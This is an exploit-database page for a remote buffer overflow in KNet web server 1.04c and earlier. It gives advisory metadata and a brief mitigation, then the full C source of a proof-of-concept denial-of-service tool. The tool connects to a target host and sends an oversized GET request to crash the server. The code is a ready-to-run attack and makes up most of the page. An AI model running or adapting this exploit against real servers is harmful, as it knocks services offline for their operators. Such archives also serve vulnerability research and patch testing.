KNet - exploit.company

vendor:

KNet

by:

Expanders

7.5

CVSS

HIGH

Remote Buffer Overflow

120

CWE

Product Name: KNet

Affected Version From: KNet <= 1.04c

Affected Version To: KNet <= 1.04c

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: None

2004

KNet <= 1.04c Remote Buffer Overflow Vulnerability

A remote buffer overflow vulnerability affects Stormy Studios KNet. This issue is due to a failure of the application to securely copy user-supplied input into finite process buffers. An attacker may leverage this issue to execute arbitrary code on a computer with the privileges of the affected server, facilitating unauthorized access.

Mitigation:

Ensure that user-supplied input is securely copied into finite process buffers.

Source

Exploit-DB raw data:

// source: https://www.securityfocus.com/bid/12671/info

A remote buffer overflow vulnerability affects Stormy Studios KNet. This issue is due to a failure of the application to securely copy user-supplied input into finite process buffers.

An attacker may leverage this issue to execute arbitrary code on a computer with the privileges of the affected server, facilitating unauthorized access. 

/*

      KNet <= 1.04c is affected to a remote buffer overflow in GET command.
   This PoC demostrate the vulnerability.

      KNet <= 1.04c PoC Denial Of Service Coded by: Expanders

      Usage: ./x0n3-h4ck_Knet-DoS.c <Host> <Port>

*/

#include <stdio.h>
#include <string.h>
#include <netdb.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>

void help(char *program_name);

int main(int argc, char *argv[]) {

    struct sockaddr_in trg;
    struct hostent *he;
 long addr;
    int sockfd, buff,rc;
 char evilbuf[1024];
 char buffer[1024];
 char *request;
 if(argc < 3 ) {
  help(argv[0]);
  exit(0);
 }
 printf("\n\n-=[ KNet <= 1.04c PoC DoS ::: Coded by Expanders ]=-\n");
    he = gethostbyname(argv[1]);
    sockfd = socket(AF_INET, SOCK_STREAM, 0);
 request = (char *) malloc(12344);
    trg.sin_family = AF_INET;
    trg.sin_port = htons(atoi(argv[2]));
    trg.sin_addr = *((struct in_addr *) he->h_addr);
    memset(&(trg.sin_zero), '\0', 8);
 printf("\n\nConnecting to target \t...");
 rc=connect(sockfd, (struct sockaddr *)&trg, sizeof(struct sockaddr_in));
 if(rc==0)
 {
  printf("[Done]\nBuilding evil buffer\t...");
  memset(evilbuf,90,1023);
  printf("[Done]\nSending evil request \t...");
  sprintf(request,"GET %s \n\r\n\r",evilbuf);
  send(sockfd,request,strlen(request),0);
  printf("[Done]\n\n[Finished] Check the server now\n");
 }
 else
  printf("[Fail] -> Unable to connect\n\n");
 close(sockfd);
 return 0;

}

void help(char *program_name) {

 printf("\n\t-=[ KNet <= 1.04b PoC Denial Of Service ]=-\n");
 printf("\t-=[ ]=-\n");
 printf("\t-=[ Coded by
ders -/www.x0n3-h4ck.org\\- ]=-\n\n");
 printf("Usage: %s <Host> <Port>\n",program_name);
}